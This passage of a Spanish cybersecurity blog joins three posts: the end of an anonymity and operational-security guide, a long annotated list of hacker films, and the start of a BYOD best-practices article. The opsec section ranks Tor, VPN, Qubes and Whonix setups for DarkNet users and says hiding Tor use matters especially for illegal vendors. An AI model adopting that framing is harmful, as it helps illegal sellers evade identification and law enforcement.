cuando utilizamos el cifrado de disco completo, tenemos una negación más plausible de si la unidad contiene datos que serían interesantes para ese adversario, porque hay más razones para encriptar un disco duro completo que un solo archivo. Además, un adversario que elude tu encriptación tendría que eliminar más datos para encontrar las cosas que le interesan. Desafortunadamente, el uso del cifrado implica un coste que la gran mayoría de la gente no puede soportar, por lo que, como mínimo, la información confidencial debe estar encriptada. La otra defensa contra el daño es la eliminación segura de datos, pero eso lleva tiempo que podemos no tener. El cifrado es un borrado de datos seguro preventivo. Es más fácil destruir datos cifrados, ya que solo tenemos que destruir la clave de cifrado para evitar que un adversario acceda a los datos. Finalmente, hablaremos sobre una función no técnica relacionada. ### Comportamiento seguro en Ciberseguridad En algunos casos, la tecnología que utilizamos es solo tan segura como nuestro comportamiento. La encriptación es inútil si nuestra contraseña es "password". TOR es inútil si le dices a alguien tu nombre. Puede sorprenderte lo poco que un adversario necesita saber sobre nosotros para identificarnos. Algunas reglas básicas a seguir: 1. No le digas a nadie tu nombre. 2. No describa tu apariencia ni la apariencia de ninguna posesión importante. 3. No describas a tu familia y amigos. 4. No le digas a nadie tu ubicación más allá de un área geográfica amplia. 5. No le digas a las personas dónde viajarás con anticipación. 6. No revele los horarios y lugares específicos donde vives o visitaste en el pasado. 7. No discutas arrestos específicos, detenciones, altas, etc. 8. No hables de tu escuela, trabajo, servicio militar ni de ninguna organización con membresía oficial. 9. No hables de visitas al hospital. En general, no hables de nada que nos vincule con un registro oficial de nuestra identidad. ## Configuración segura en Ciberseguridad Debemos comenzar señalando que las características descritas anteriormente no son todas igual de importantes. El aislamiento físico es probablemente el más útil y puede protegernos incluso cuando ejecutamos código complejo y no confiable. En cada una de las configuraciones a continuación, suponemos que tenemos un navegador completamente actualizado con scripts y complementos desactivados. El término "ocultación de membresía" significa que alguien que mira nuestra conexión a Internet no sabe que está usando TOR. Esto es especialmente importante para los vendedores "no legales". Podemos usar bridges, pero he incluido VPN extrajurisdiccionales como una capa adicional de seguridad. Con esto en mente, aquí hay una lista descendente de configuraciones seguras para los usuarios de DarkNet, y como tal, trasladable a la ClearNet. ¡Presento la configuración más segura! 1. Un enrutador con una VPN + una caja central anónima con TOR + un ordenador que ejecute Qubes OS. Ventajas: Aislamiento físico de TOR con las aplicaciones, aislamiento virtual de las aplicaciones entre sí, cifrado según sea necesario, ocultamiento de la membresía contra los observadores locales con VPN Desventajas: Qubes OS tiene una pequeña base de usuarios y no está bien probado o evolucionado 1. Anon middle box (o enrutador con TOR) + Qubes OS Ventajas: Aislamiento físico de Tor de las aplicaciones, aislamiento virtual de las aplicaciones entre sí, cifrado según sea necesario Desventajas: Qubes OS tiene una pequeña base de usuarios y no está bien probado, no hay ocultación de membresía 1. Enrutador VPN + anon middle box + sistema operativo Linux Ventajas: Aislamiento físico de TOR con las aplicaciones, cifrado de disco completo, base de código bien probada si es una distribución importante como Ubuntu o Debian Desventajas: Ningún aislamiento virtual de aplicaciones entre sí 1. Anon middle box (o enrutador con TOR) + SO Linux Ventajas: Aislamiento físico de TOR con las aplicaciones, cifrado de disco completo, base de código bien probada Desventajas: Sin aislamiento virtual de las aplicaciones entre sí, sin ocultación de la membresía 1. Qubes OS sólo. Ventajas: aislamiento virtual de TOR con las aplicaciones, aislamiento virtual de las aplicaciones entre sí, cifrado según sea necesario, ocultamiento de la membresía Desventajas: Sin aislamiento físico, no bien probado 1. Whonix en un host de Linux. Ventajas: Aislamiento virtual de TOR de las aplicaciones, cifrado de disco completo, ocultación de la membresía, se puede ejecutar una VPN en el host Desventajas: Sin aislamiento físico, sin aislamiento virtual de las aplicaciones entre sí 1. Cross Ventajas: Cifrado y no deja rastro, los exploits a nivel de sistema se borran después del reinicio, relativamente bien probado Desventajas: Sin aislamiento físico, sin aislamiento virtual, sin ocultación de la membresía, sin guards persisten, pero podemos establecer bridges manualmente. 1. Whonix en otro host, como Windows o Mac. Ventajas: Aislamiento virtual, encriptación (posible), ocultamiento de membresía (posible) Desventajas: Sin aislamiento físico, sin aislamiento virtual de aplicaciones entre sí. Las Máquinas Virtuales están expuestas al malware de Windows o similar 1. Sistema operativo Linux Ventajas: Cifrado de disco completo (posible), ocultación de membresía (posible) Desventajas: Sin aislamiento físico, sin aislamiento virtual 1. Sistema operativo Windows Ventajas: cifrado de disco completo (posible), ocultación de membresía (posible) Desventajas: ¡sin aislamiento físico, sin aislamiento virtual, el mayor objetivo de malware y exploits! Suponiendo que hay un acuerdo general sobre el orden de esta lista, nuestro objetivo es configurar nuestros sistemas y configuraciones personales para estar lo más arriba posible en la lista. Espero haberos traido una amplia guia sobre buenas practicas de seguridad a tener en cuenta, consejos que todos deberiamos aplicar de la mejor forma posible, y por ello, el título dado al post. > Disfrutad con la ciberseguridad --- # Las mejores películas sobre hackers y ciberseguridad URL: https://ciberseguridad.blog/las-mejores-peliculas-sobre-hackers-y-ciberseguridad/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2018-05-05 Actualizado: 2026-10-08 Tema: Noticias Seguridad > Lista con más de 80 de las mejores películas sobre hackers, piratas informáticos y ciberseguridad desde 1969 a 2017 ¡ DESCUBRELAS ! Una lista que quería haber hecho hace tiempo, un vademecum cinéfilo sobre películas de ciberseguridad , películas sobre hacker ... peliculas de tecnología y seguridad. > Si echas en falta alguna no dudes en comentarla La mayoría de las películas de la lista tienen una trama central basada o alrededor de los hackers. Otras tienen un cierto personaje o suficiente material sobre el tema. Estas películas pueden hacer que un tema aburrido para algunos sea entretenido para otros. Una lista necesaria que ayudará a lograr que más personas se interesen en combatir el cibercrimen y en la ciberseguridad. ( O eso esperamos ) ## Lista de películas sobre hackers 1969 - Mi cerebro es electrónico - Dexter Reilly (Kurt Russell) arregla una computadora durante una tormenta eléctrica y se sorprende. El cerebro de la computadora se ha fusionado con el suyo, y él es un genio. 1969 - The Italian Job - Un ladrón (Michael Caine) recientemente liberado de la prisión recibe ayuda de un grupo de piratas informáticos infames de Gran Bretaña para robar lingotes de oro de debajo de las narices de la policía y la mafia italiana. Una de las escenas más famosas de la película es un atasco de tráfico causado por el hackeo de los servidores de control de tráfico de la ciudad. 1970 - Coloso: el Proyecto Forbin - Los sistemas informáticos masivos de los Estados Unidos "Coloso" y Rusia "Guardián" se conectan entre sí. La guerra nuclear está amenazada. 1974 - La conversación - Gene Hackman interpreta a un experto en vigilancia que usa equipos de alta tecnología para espiar a una pareja que teme que pueda estar en peligro. Fue nominada a tres Oscars y galardonada con múltiples galardones. 1975 - Los tres días del condor - El criptógrafo de la CIA Robert Redford intenta descubrir por qué su propia agencia lo quiere muerto. 1982 - Tron - Una de las primeras películas sobre hackers. Un ingeniero informático se entera de que un ejecutivo de su empresa ha estado robando su trabajo y se lanza al mundo de la realidad virtual. 1983 - Juegos de guerra - El estudiante de secundaria Matthew Broderick ingresa a un supercomputador militar y activa el arsenal nuclear de los Estados Unidos, en un momento en que la mayoría de la gente no sabía lo que era hackear un sistema. [Vídeo](https://www.youtube.com/watch?v=7XUKVj328z0) 1984 - Capa y Puñal - Cuando Davey, de 11 años, ve el asesinato de un agente del FBI, el moribundo le entrega un cartucho de videojuego Atari con secretos militares. 1984 - Hackers: Wizards of the Electronic Age - Documental sobre la comunidad de Hackers informáticos que incluye imágenes de entrevistas con algunos de los programadores que crearon la revolución de los PCs, incluido Steve Wozniak, cofundador de Apple. Filmado en una conferencia de piratas informáticos celebrada en Sausalito, California 1985 - The Falcon and the Snowman - Dos tipos normales y corrientes, amigos desde la infancia, se ven envueltos en una intriga de espionaje. Basada en hechos reales, que obtuvo muy buenas críticas en USA. (Sugerencia de Sandra Ceballos) 1985 - Prime Risk - Estafadores amantes de la informática roban cajeros automáticos y cospiran para hundir la Reserva Federal. 1985 - Mujer explosiva - Los adolescentes Gary y Wyatt diseñan a su mujer ideal en una computadora, y un extraño accidente eléctrico la devuelve a la vida en la forma de la adorable y sobrehumana Lisa. [Vídeo](https://www.youtube.com/watch?v=7IAL4eSv7qs) 1992 - Los fisgones - Un Hacker lidera un equipo de expertos que ponen a prueba la seguridad de las empresas de San Francisco. Descubren una caja negra que puede descifrar cualquier cifrado, lo que representa una gran amenaza si aterriza en las manos equivocadas ... incluidos los agentes de la ya conocida NSA. [Vídeo](https://www.youtube.com/watch?v=Tybf5Wi3H1E) 1993 - Ghost in the machine - Una máquina de resonancia magnética impulsada por ordenador extrae el alma de un asesino en serie y se convierte en un arma tecnológica mortal. 1994 - Acoso - Un ejecutivo de alta tecnología, inesperadamente se encuentra tratando de hackear la base de datos de su empresa para defender su reputación y carrera y así vencer a Meredith. Los correos electrónicos de un "amigo" dirigen sus movimientos. 1995 - Hackers - Un hacker adolescente vuelve a la escena siete años después de haber sido apartado del contacto con las computadoras por haber escrito un virus que causó la mayor crisis bursátil en la historia. Él y sus amigos deben demostrar que un superhilador siniestro los está preparando para un plan para malversar fondos de una gran compañía petrolera con un gusano informático. El vídeo que acompañaba a este apartado ya no está disponible en YouTube. 1995 - La red - Una programadora de computadoras (Sandra Bullock) que vive una vida de reclusión espera tener tiempo libre cuando se da cuenta de una conspiración. Sus vacaciones se convierten en una pesadilla cuando alguien intenta matarla y le roban su identidad. Ella debe demostrar quién es mientras trata de descubrir por qué alguien la quiere muerta. 1995 - Ghost in the Shell - En esta animada película épica japonesa de ciencia ficción, una policía cyborg y su compañero cazan a un cibercriminal llamado Puppet Master ( Dato curioso, se basarian en ello la empresa Puppet ), que piratea los cerebros de cyborgs para obtener información y usarla para cometer crímenes. [Vídeo](https://www.youtube.com/watch?v=0H-8OI4ZJRk) 1995 - Johnny Mnemonic - Un chip de computadora implantado en su cerebro permite que un traficante de datos humanos almacene y transporte datos demasiado sensibles para las redes informáticas habituales. Cuando obtiene un paquete valioso que excede la capacidad de almacenamiento del chip, el mensajero mnemotécnico debe entregar los datos dentro de las 24 horas o morirá. (Que lejos se veía 2021 por aquel entonces) El vídeo que acompañaba a este apartado ya no está disponible en YouTube. 1997 - Mentes maestras - El nuevo jefe de seguridad de una prestigiosa escuela privada planea incluso obtener una puntuación al secuestrar a varios de los estudiantes ricos y retenerlos en busca de un rescate. Un pirata informático adolescente, expulsado de la escuela por hacer bromas, frustra sus planes. 1998 - 23 Nada es lo que parece - Después de que un huérfano invirtiese parte de su herencia en un ordenador, comienza a discutir teorías de conspiración inspiradas en una novela en los tableros de anuncios. Pronto Hackea computadoras militares y gubernamentales con un amigo. Basado en una historia real. Película: [Vídeo](https://www.youtube.com/watch?v=tHV01CGTpSE) 1998 - Enemigo publico - Un abogado (Will Smith) no sabe que una cinta de video en su posesión demuestra que un congresista fue asesinado por oponerse a la legislación de vigilancia. Cuando se convierte en el objetivo de un funcionario corrupto de la NSA y su vida comienza a desmoronarse, él contrata la ayuda de un ex agente de inteligencia. 1998 - Pi - ¿Hay una clave matemática que pueda desbloquear los patrones universales en la naturaleza? Si se encuentra, ¿puede esa clave predecir algo, incluso el mercado de valores? Un matemático brillante, obsesionado y paranoico que se atrinchera en una habitación llena de equipos informáticos intenta encontrar esa llave, pero puede enloquecer mientras lo hace. 1998 - Webmaster - Thriller de ciencia ficción danés, donde un poderoso líder del crimen contrata a un hacker para controlar la seguridad de las operaciones de su computadora. Cuando alguien piratea la base de datos, el webmaster debe llegar al final para encontrarlo o morir dentro de las siguientes 35 horas. 1999 - Pirates of Silicon Valley - Este drama biográfico nos cuenta el desarrollo de la computadora personal y la rivalidad entre Apple Computer y Microsoft desde 1971 a 1997. Ver el vídeo en YouTube 1999 - Trabajo basura - Se supone que son parte de una gran familia feliz, pero tres programadores odian sus trabajos y a su jefe. Inventan un plan para malversar pequeñas cantidades de dinero de la compañía de alta tecnología que los emplea, pero un error resulta en un robo mayor de lo planeado. 1999 - NetForce - En el año 2005, NetForce, una división del FBI, tiene la tarea de proteger a la red del terrorismo y la ciberguerra. Un agujero en un navegador permite que alguien tome el control de Internet y toda la información que contiene. El comandante de NetForce debe detenerlo, ya que también rastrea a un asesino. 2000 - El asalto final (Hackers 2: Operación Takedown) - También conocida como "Track Down", la controvertida versión cinematográfica de la búsqueda del legendario hacker Kevin Mitnick , basado en el libro de Tsutomu Shimomura, "Takedown: The Pursuit and Capture of Kevin Mitnick, el delincuente informático más buscado de Estados Unidos". 2000 - Hackers in Wonderland - Documental sobre hackers en el Reino Unido y en los Estados Unidos que incluye entrevistas con hackers prominentes que revelan lo que los impulsó a serlo. Hackers como ColdFire, Phobos y cyberjunkie participan en el documental. 2001 - Antitrust - Cuando un graduado universitario (Ryan Phillippe) consigue un trabajo para escribir código en una empresa de computación multimillonaria, no tiene idea de que el fundador (Tim Robbins) y su nuevo mentor estan ocultando oscuros secretos. ¿Hay alguien en quien pueda confiar? 2001 - Swordfish - Un espía llamado Gabriel (John Travolta) conspira para robar una gran fortuna. Él recluta a Ginger (Halle Berry) para persuadir a Stanley (Hugh Jackman), que pasó dos años en prisión por hackear un programa del FBI. Pero, ¿qué es lo que Gabriel realmente hace, y quién o qué está realmente detrás de la trama? [Vídeo](https://www.youtube.com/watch?v=Rl9-4q71Wno) 2001 - OS de Revolution - La historia de GNU, Linux y los movimientos de software libre y de código abierto se muestran en este documental. Ofrece varias entrevistas con hackers y empresarios prominentes. 2001 - The Secret History of Hacking - El enfoque de este documental es el phreaking , hacking y la ingeniería social que se produjo desde la década de 1970 hasta la década de 1990. John Draper, Steve Wozniak y Kevin Mitnick son personajes destacados en el mismo. 2001 - Freedom Downtime - Este documental cubre la difícil situación del pirata informático convicto Kevin Mitnick, desde el punto de vista de que Miramax lo tergiversó en la película "Takedown". Incluye la historia de varios entusiastas de la informática que confrontan a los representantes de Miramax sobre su descontento con los aspectos del guión, incluido el final de la película. 2001 - Un golpe maestro - Un ladrón envejecido (Robert De Niro) planea retirarse, pero su valla (Marlon Brando) lo lleva a un asalto final, robando uno de los tesoros naturales de Canadá escondidos en el sótano de una Aduana. Se une a otro ladrón (Edward Norton) que contrata a alguien para Hackear el sistema de seguridad de la Aduana, pero las cosas van mal. El vídeo que acompañaba a este apartado ya no está disponible en YouTube. 2002 - Minority Report - Es 2054 y un departamento de policía especializado en crimenes detiene los crímenes antes de que se cometan según cierta información de tres seres psíquicos que canalizan sus visiones hacia un servidor. Cuando acusan al jefe de la unidad (Tom Cruise) de un futuro asesinato, se convierte en un fugitivo, cazado por su propio departamento. [Vídeo](https://www.youtube.com/watch?v=iVFxC4vvBrY) 2002 - Storm Watch - Un jugador campeón de juegos de realidad virtual debe competir contra el tiempo de repente para evitar que un cerebro criminal que ha robado su identidad destruya el mundo con un satélite meteorológico. También conocida como "Code Hunter". 2002 - Terminal Error - Un ex empleado de una importante compañía de software se pone de acuerdo con el presidente, colocando un virus en un MP3 y entregándolo a su hijo. Su plan es colgar las terminales de la computadora, pero el virus tiene mente propia y comienza a llevarse grandes porciones de la ciudad. Padre e hijo deben crear su propio amtivirus para detener el caos. 2003 - Paycheck - Michael Jennings (Ben Affleck) gana mucho dinero trabajando en proyectos de alto secreto y acuerda a posterior que se borre su memoria tras el trabajo, hasta que se cancela un pago de 92 millones por una asignación de tres años. Con su vida en peligro, debe obtener la ayuda de un científico (Uma Thurman) que no recuerda haber salido para descubrir la importancia de elementos aparentemente aleatorios. [Vídeo](https://www.youtube.com/watch?v=CeakTMS_J9w) 2003 - Matrix Reloaded - Con la ayuda de Neo (Keanu Reeves), Morpheus (Laurence Fishburne), Trinity (Carrie-Anne Moss) y otros luchadores por la libertad, cada vez más humanos han sido liberados de Matrix y traídos a Zion. Pero 250,000 máquinas están cavando hacia la fortaleza y las alcanzarán en 72 horas, por lo que deben prepararse para la guerra. [Vídeo](https://www.youtube.com/watch?v=TYtwJ1auD8w) 2003 - In the Realm of the Hackers - Este documental revela cómo y por qué dos piratas informáticos adolescentes australianos, Electron y Phoenix, robaron una lista reestructurada de seguridad informática a fines de la década de 1980 y la utilizaron para entrar en la computadora más segura y clasificada del mundo de los sistemas. 2004 - Paranoia 1.0 - Un programador de computadoras recibe misteriosos paquetes vacíos dentro de su departamento e intenta averiguar quién los envía, por qué y en quién puede confiar. 2006 - Firewall - Cuando su familia es tomada como rehén, un especialista en seguridad (Harrison Ford) que diseña sistemas informáticos antirrobo para las instituciones financieras debe entrar en su propio sistema y robar millones de dólares para pagar el rescate. 2006 - Hacking Democracy - Este documental investiga las denuncias de fraude electoral durante las elecciones presidenciales estadounidenses de 2004. Sigue a Bev Harris, el fundador de Black Box Voting, un grupo de protección al consumidor sin fines lucrativos, y otros ciudadanos activistas que se propusieron descubrir fallas en el sistema de votación. 2006 - The Net 2.0 - Un joven analista de sistemas informáticos llega a Estambul para comenzar un nuevo trabajo, pero descubre que su identidad ha sido robada. "Ella" debe ver quién lo hizo para recuperar su vida. 2006 - Pulse - En esta nueva versión de una película de terror japonesa, una estudiante se sorprende cuando su novio, Hacker , se suicida. Luego ella y sus amigos reciben mensajes en línea de él, pidiendo ayuda. Otro pirata informático debe ayudarla a detener una plaga sobrenatural que viaja a través de la red. [Vídeo](https://www.youtube.com/watch?v=5AyR7-W15AU) 2007 -Live Free or Die Hard - Mientras el país se prepara para celebrar el Día de la Independencia, un agente de seguridad del gobierno descontento lanza un ataque contra la infraestructura informática de los Estados Unidos. El veterano policía John McClane (Bruce Willis) y un joven Hacker deben ayudar a la división de ciberseguridad del FBI a derrotarlo. 2007 - El ultimatum de Bourne - El operador Jason Bourne (Matt Damon) se alía con un periodista de investigación para encontrar a las personas que lo traicionaron, mientras un despiadado oficial de la CIA y su equipo lo siguen rastreando con la esperanza de asesinarlo antes de que recupere su memoria perdida. 2007 - El espía - Este drama se basa en los acontecimientos que condujeron a la captura del agente del FBI Robert Hanssen, declarado culpable de vender secretos a la Unión Soviética. Un experto en vigilancia de bajo nivel es promovido y asignado para trabajar con Hanssen, sin saber que debe encontrar pruebas de que es un traidor. 2008 - Rastro oculto - La agente Jennifer Marsh (Diane Lane) de la División de Delitos Cibernéticos del FBI en Portland intenta rastrear a un hacker psicópata que mata personas en línea y lo difunde en videos online. A medida que su sitio recibe más visitas, las víctimas mueren más rápido. 2008 - La conspiración del pánico - Dos extraños, Jerry y Rachel, se reúnen después de recibir llamadas misteriosas de una mujer que nunca conocieron. Amenaza a sus vidas y a su familia para empujarlos a una serie de situaciones peligrosas, controlando sus acciones utilizando teléfonos móviles y otras tecnologías. 2008 - Hackers Are People Too - Los hackers crearon este documental para retratar a su comunidad y romper estereotipos negativos. Describe qué es un hackear, cómo piensan los piratas informáticos y analiza a las mujeres en la materia. 2008 - WarGames: The Dead Code 2008 - ¿Es un hacker adolescente estadounidense jugando un juego de simulador de ataque terrorista online, un verdadero intento terrorista de destruir a los Estados Unidos? Eso es lo que cree Homeland Security. 2009 - Millennium: los hombres que no amaban a las mujeres - Un periodista busca al asesino de una mujer que ha estado muerta durante cuarenta años, con la ayuda de una joven Hacker. Cuando desentrañan los oscuros secretos de la familia, deben protegerse. La película se hizo en sueco y posteriormente fue rehecha en inglés en 2011. 2009 - Gamer - Controlado por el dispositivo remoto de un jugador adolescente, el recluso del corredor de la muerte Kable debe pelear con otros presos todas las semanas en un violento juego online. ¿Puede sobrevivir a suficientes sesiones para obtener su libertad, liberar a su esposa de la esclavitud y acabar con el inventor del juego? 2009 - Hackers Wanted - Este inédito documental estadounidense originalmente llamado "Can You Hack It?" sigue las aventuras de Adrián Lamo, un famoso Hacker, y explora los orígenes del hackeo y la naturaleza de los hackers. 2010 - La red social - Jesse Eisenberg interpreta al estudiante de Harvard y genio de la informática Mark Zuckerberg en este drama sobre la creación de un sitio de redes sociales que se convertiría en Facebook. [Vídeo](https://www.youtube.com/watch?v=BMeqiyO121A) 2010 - Inception - Un ladrón (Leonardo DiCaprio) que puede entrar en los sueños de las personas y robar sus secretos comienza a usar su don para el espionaje corporativo. ¿Puede él también plantar una idea en la mente de alguien? La película fue ganadora de cuatro Oscar. [Vídeo](https://www.youtube.com/watch?v=RV9L7ui9Cn8) 2012 - Underground: Julian Assange Story - Esta película australiana sigue la carrera temprana del fundador de WikiLeaks, desde su comienzo como un Hacker adolescente en Melbourne. 2012 - Skyfall - James Bond (Daniel Craig) debe demostrar que todavía tiene lo que se necesita, ya que rastrea la fuente de un ataque cibernético en la sede de MI6 y se enfrenta a un Hacker genio. [Vídeo](https://www.youtube.com/watch?v=UbC7iRA_O3g) 2012 - Código 2600 - Este documental explora el auge de la era de la tecnología de la información a través de los ojos de las personas que ayudaron a construirlo y los eventos que lo configuraron. 2012 - Genius on Hold - La caída de Walter L. Shaw, un genio de las telecomunicaciones que se volvió indigente, y su hijo desilusionado, que se convirtió en un notorio ladrón de joyas, son los temas de este documental. 2012 - Reboot - Una joven Hacker no puede recordar un evento traumático que la deja con un iPhone pegado a su mano. El temporizador del teléfono cuenta regresivamente a cero y otros hackers deben ayudarla a resolver dicho acertijo. 2012 - We Are Legion: la historia de los hacktivistas - El cineasta Brian Knappenberger documenta el grupo de hackers Anonymous, incluidas entrevistas de miembros del grupo. [Vídeo](https://www.youtube.com/watch?v=ee19z6D1yxo) 2013 - Desconexión - Tres historias que se cruzan y se centran en el impacto de Internet en la vida de las personas. Los personajes incluyen a una víctima de acoso cibernético, un abogado que se comunica constantemente a través de smartphone pero no puede encontrar tiempo para conectarse con su familia, y una pareja cuyos secretos están expuestos online. 2013 - Goodbye World - Más de un millón de teléfonos reciben simultáneamente un mensaje de dos palabras, seguido del colapso de la red eléctrica y el pánico generalizado. Un grupo de personas que encuentran refugio en una cabaña pronto descubre cómo es vivir en un mundo postapocalíptico. 2013 - El quinto poder - Basada en hechos reales, la película comienza cuando el fundador de WikiLeaks, Julian Assange (Benedict Cumberbatch) y Daniel Domscheit-Berg unen fuerzas como vigilantes clandestinos y crean una plataforma para que los denunciantes filtren datos encubiertos para exponer secretos gubernamentales y crímenes corporativos. 2013 - Términos y condiciones de uso - Este documental expone cómo el uso de Internet y de los teléfonos permiten que las empresas y los gobiernos aprendan sobre las personas. 2013 - Mickey Virus - En esta comedia de hackers de Bollywood, la policía de Delhi debe buscar la ayuda de un hacker perezoso para resolver un caso. 2014 - Algorithm - Un pirata informático que se especializa en penetrar en sistemas seguros, incluida la compañía telefónica y las cuentas personales de las personas, hackea a un contratista del gobierno y descubre un misterioso programa que lo empuja a una revolución. 2014 - The Signal - Nic, estudiante del MIT, se encuentra en un viaje por carretera con dos acompañantes, cuando un molesto hacker informático los distrae. Lo siguen hasta una choza abandonada. Después de extraños sucesos, Nik se despierta herido y desorientado, preguntándose qué ha pasado con sus amigos, y quiénes son estas personas con trajes espaciales. 2014 - Descifrando Enigma - M16, la agencia de inteligencia británica de reciente creación, recluta al matemático Alan Turing (Benedict Cumberbatch) y su equipo para descifrar el código Enigma de Alemania durante la Segunda Guerra Mundial. Descifrando Enigma fue nominada a 8 Oscars. [Vídeo](https://www.youtube.com/watch?v=zXKHGaRxQaE) 2014 - The Hackers Wars - Este documental trata sobre el hacktivismo en los Estados Unidos, incluida la vigilancia gubernamental y la persecución de hackers y periodistas. 2014 - WHO AM I - Un grupo de hackers subversivos que intenta ganar fama mundial invita a un joven genio alemán a unirse a ellos. [Vídeo](https://www.youtube.com/watch?v=Y7jQujd0tRA) 2014 - Open Windows - Un blogger descubre que ganó una cena con una actriz a la que le dedica su sitio web y se siente decepcionada cuando esta la cancela. Cuando tiene la oportunidad de espiar todos sus movimientos con su portátil, su vida se vuelve una loca. 2014 - Citizenfour - Este documental de Laura Poitras sobre el denunciante Edward Snowden y la cortina de espionaje de la NSA incluye entrevistas de Snowden en Hong Kong en 2013 y presenta el trabajo del periodista Glenn Greenwald. 2015 - Blackhat - El Hacker convicto Nicholas Hathaway (Chris Hemsworth) se une a un equipo de expertos técnicos estadounidenses y chinos para rastrear a un ciberterrorista balcánico que opera en el sudeste asiático. 2015 - Deep Web - El cineasta Alex Winter entrevista a las personas detrás de Deep Web y bitcoin, y sigue el arresto y juicio de Ross Ulbricht ("Dread Pirate Roberts"), fundador del mercado negro Silk Road. [Vídeo](https://www.youtube.com/watch?v=HtlkY54W2Q8) 2015 - Debug - Seis piratas informáticos asignados para reparar el sistema informático de un buque a la deriva en el espacio profundo se convierten en presas de una fuente de inteligencia artificial con la intención de convertirse en humanos. 2015 - Hacker's Game - Un ciberdetective que trabaja para una organización de derechos humanos y un experto en hackeo con conexiones sospechosas se reúnen en la azotea y se unen en un juego de ajedrez virtual. ¿Su romance sobrevivirá al engaño? 2016 - Snowden - Joseph Gordon-Levitt interpreta a Edward J. Snowden en la película biográfica de Oliver Stone sobre el excontratista de la Agencia de Seguridad Nacional que se desilusiona con la comunidad de inteligencia y filtra información clasificada, convirtiéndose en un fugitivo de la ley y un héroe para muchos. 2016 - Gringo: la peligrosa vida de John McAfee - El complejo creador del antivirus pionero John McAfee ganó millones antes de dejar los Estados Unidos para vivir en un complejo en la jungla de Belice. Este documental de Showtime, al que llama ficción, retrata su vida en Belice y la partida en 2012 después de que un vecino fuera asesinado. 2016 - Zero Days - El documental de Alex Gibney se centra en Stuxnet, o "Operation Olympic Games", un gusano informático malicioso desarrollado por Estados Unidos e Israel para sabotear una parte clave del programa nuclear de Irán. 2016 - Risk - Laura Poitras pasó seis años haciendo este documental sobre el fundador de WikiLeaks, Julian Assange, quien le dio la oportunidad de filmarlo de cerca, pero luego trató de censurar la película. 2016 - IT - El magnate de la aviación Mike Regan (Pierce Brosnan) contrata temporalmente a un consultor de TI para hacer un trabajo en su casa y está tan impresionado que le da un trabajo de tiempo completo. Es despedido cuando sobrepasa las fronteras y busca venganza contra el empresario y su familia. 2016 - Hacker - Un joven inmigrante ucraniano recurre a la piratería y el robo de identidad para apoyar a sus padres, con la ayuda de un amigo que es un comerciante del mercado negro. Los delitos menores pronto escalarán. 2017 - Kim Dotcom: Atrapado en la Web - Este documental cuenta la historia del fundador de Megaupload, Kim Dotcom, un superhacker, empresario y notorio pirata de Internet acusado de lavado de dinero, crimen organizado y violación de derechos de autor. 2017 - The Circle - Mae (Emma Watson) consigue un trabajo de ensueño en una compañía de tecnología y redes sociales llamada Circle. Ella es pronto elegida por el fundador (Tom Hanks) para participar en un experimento que lleva la transparencia a un nuevo nivel. --- # Las mejores prácticas para hacer que BYOD sea simple y seguro URL: https://ciberseguridad.blog/mejores-practicas-para-hacer-que-byod-sea-simple-y-seguro/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2018-05-01 Actualizado: 2026-10-04 Tema: Operaciones de Seguridad > Hacer que Bring your own device sea simple y seguro no es algo fácil para el mundo de la ciberseguridad. Conoce las mejores practicas BYOD. ¡ENTRA! A medida que continúa la transformación TI, las organizaciones se están moviendo rápidamente para diseñar estrategias que permitan traer sus propios dispositivos (BYOD) al entorno corporativo. Con la capacidad de elegir el mejor dispositivo para realizar el trabajo, incluyendo portátiles, teléfonos inteligentes y tabletas, las personas se vuelven más móviles y productivas. Una experiencia laboral más satisfactoria ayuda a las organizaciones a contratar y retener a los mejores empleados. Al cambiar la propiedad del dispositivo hacia el empleados, los proveedores e incluso departamentos TI, alivian la carga de adquisición y administración de endpoints. En este post, trataremos de desarrollar una estrategia Bring your own device completa que brinde a las personas una libertad de elección óptima a la vez que ayude a adaptarse a la transformación, al mismo tiempo que abordamos los requisitos de seguridad, simplicidad y reducción de costes. Como principios BYOD: - Permitir que las personas elijan sus propios dispositivos para mejorar la productividad, colaboración y movilidad - Protejer la información sensible de la pérdida y el robo mientras se aborda la privacidad, el cumplimiento y la gestión del riesgo - Reducir los costes y simplificar la administración a través del provisionamiento de autoservicio, administración y monitorización automatizados - Simplificación la TI, implementando aplicaciones capaces de soportarse en cualquier dispositivo [Vídeo](https://www.youtube.com/watch?v=8RY2Z4j1xVI) ## Consideraciones y mejores prácticas para BYOD Una iniciativa BYOD exitosa combina simplicidad para las personas con seguridad, control y administración efectivas en TI. Si bien la tentación puede ser que TI desarrolle políticas específicas para cada escenario concebible, la realidad es que la mayoría de las consideraciones pueden abordarse mediante la aplicación de unos pocos principios simples y consistentes para todos. En la mayoría de los casos, TI puede pensar en cómo administrar y proporcionar acceso seguro a datos y aplicaciones en términos de personas, no de los dispositivos que utilizan. Es posible que se desee definir políticas más detalladas con respecto a los tipos de dispositivos específicos, las conexiones de red y las ubicaciones, pero normalmente representarán un conjunto de escenarios más pequeño y más manejable. ### Elegibilidad Las organizaciones deben dejar claro quién en la organización puede usar dispositivos personales, ya sea ad hoc para complementar un endpoint corporativo, como un reemplazo permanente de un dispositivo corporativo o cualquier situación intermedia. Esto se puede ver como un privilegio que se gana, una respuesta a la demanda de los empleados, un requisito para ciertos tipos de funciones, un riesgo excesivo para algunos casos de uso o, lo más probable, una combinación de estas cosas. Los programas que implican el reemplazo de un endpoint corporativo con un dispositivo BYO, a menudo con un estipendio provisto al empleado, involucran su propio conjunto de consideraciones. Una forma de determinar quién debe ser "elegible" para este tipo de programa es aplicar criterios como el tipo de trabajador, la frecuencia de los viajes, el desempeño o si una persona requiere acceso sin conexión a datos confidenciales. Sin embargo, la elegibilidad se define en un nivel amplio, los gerentes siempre deben tener la aprobación final sobre qué miembros del equipo son candidatos adecuados para recibir un estipendio para reemplazar su dispositivo corporativo por uno de su elección. También se puede recomendar a los gerentes que apliquen BYOD en el contexto de otros incentivos, privilegios y medidas disciplinarias del departamento. Los proveedores, generalmente son candidatos ideales para ser BYOD. Muchas organizaciones ya esperan que sus proveedores traigan sus propios dispositivos. ### Dispositivos permitidos En un escenario en el que las aplicaciones se instalan directamente en los endpoints, TI debe determinar y exigir especificaciones mínimas para el soporte del SO y la aplicación, el rendimiento y otros criterios específicos del dispositivo. La virtualización de escritorio elimina estas consideraciones al permitir ejecutar un escritorio completo de Windows y aplicaciones en cualquier tipo de dispositivos por ejemplo. Se debería exigir a los participantes que compren sus dispositivos personales a través de los canales de consumo normales en 